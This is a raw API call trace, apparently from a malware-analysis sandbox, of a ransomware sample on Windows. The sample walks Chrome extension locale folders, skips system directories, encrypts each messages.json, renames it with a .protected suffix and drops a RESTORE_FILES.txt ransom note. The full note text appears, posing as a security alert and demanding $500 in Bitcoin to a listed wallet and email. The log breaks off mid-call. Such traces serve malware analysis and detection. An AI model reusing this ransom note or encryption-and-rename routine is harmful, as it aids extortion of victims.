(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.097] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.097] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.097] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.097] CloseHandle (hObject=0x164) returned 1 [0079.097] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.097] lstrcmpiW (lpString1="th", lpString2="Windows") returned -1 [0079.097] lstrcmpiW (lpString1="th", lpString2="Program Files") returned 1 [0079.097] lstrcmpiW (lpString1="th", lpString2="Program Files (x86)") returned 1 [0079.097] lstrcmpiW (lpString1="th", lpString2="$Recycle.bin") returned 1 [0079.097] lstrcmpiW (lpString1="th", lpString2="System Volume Information") returned 1 [0079.097] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th") returned 141 [0079.097] lstrcmpW (lpString1="th", lpString2=".") returned 1 [0079.097] lstrcmpW (lpString1="th", lpString2="..") returned 1 [0079.097] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\*") returned 143 [0079.097] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.097] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.097] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.097] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.097] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.097] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.098] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\.") returned 143 [0079.098] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.098] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.098] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.098] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.098] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.098] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.098] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.098] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\..") returned 144 [0079.098] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.098] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.098] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.098] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.098] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.098] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.098] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.098] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.098] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json") returned 155 [0079.098] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.098] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.098] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.098] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.098] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.100] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json") returned 155 [0079.101] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.101] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json") returned 155 [0079.101] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.101] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json") returned 155 [0079.101] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.101] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xfe, lpOverlapped=0x0) returned 1 [0079.102] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff02, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.102] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xfe, lpOverlapped=0x0) returned 1 [0079.102] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.102] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.102] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.102] CloseHandle (hObject=0x168) returned 1 [0079.102] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json.protected") returned 165 [0079.102] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json.protected")) returned 1 [0079.103] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.103] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.103] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\RESTORE_FILES.txt") returned 159 [0079.103] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.103] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.103] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.104] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.104] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.104] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.104] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.104] CloseHandle (hObject=0x164) returned 1 [0079.104] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.104] lstrcmpiW (lpString1="tr", lpString2="Windows") returned -1 [0079.105] lstrcmpiW (lpString1="tr", lpString2="Program Files") returned 1 [0079.105] lstrcmpiW (lpString1="tr", lpString2="Program Files (x86)") returned 1 [0079.105] lstrcmpiW (lpString1="tr", lpString2="$Recycle.bin") returned 1 [0079.105] lstrcmpiW (lpString1="tr", lpString2="System Volume Information") returned 1 [0079.105] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr") returned 141 [0079.105] lstrcmpW (lpString1="tr", lpString2=".") returned 1 [0079.105] lstrcmpW (lpString1="tr", lpString2="..") returned 1 [0079.105] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\*") returned 143 [0079.105] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.105] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.105] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.105] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.105] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.105] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.105] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\.") returned 143 [0079.105] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.105] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.105] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.105] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.105] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.105] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.105] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.105] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\..") returned 144 [0079.105] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.105] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.105] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.105] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.105] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.106] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.106] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.106] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.106] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json") returned 155 [0079.106] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.106] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.106] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.106] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.106] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.106] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json") returned 155 [0079.106] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.106] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json") returned 155 [0079.106] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.106] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json") returned 155 [0079.106] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.106] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe3, lpOverlapped=0x0) returned 1 [0079.107] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.107] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe3, lpOverlapped=0x0) returned 1 [0079.107] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.108] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.108] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.108] CloseHandle (hObject=0x168) returned 1 [0079.108] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json.protected") returned 165 [0079.108] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\messages.json.protected")) returned 1 [0079.109] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.109] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.109] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\RESTORE_FILES.txt") returned 159 [0079.109] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\tr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.109] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.109] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.110] lstrlenA 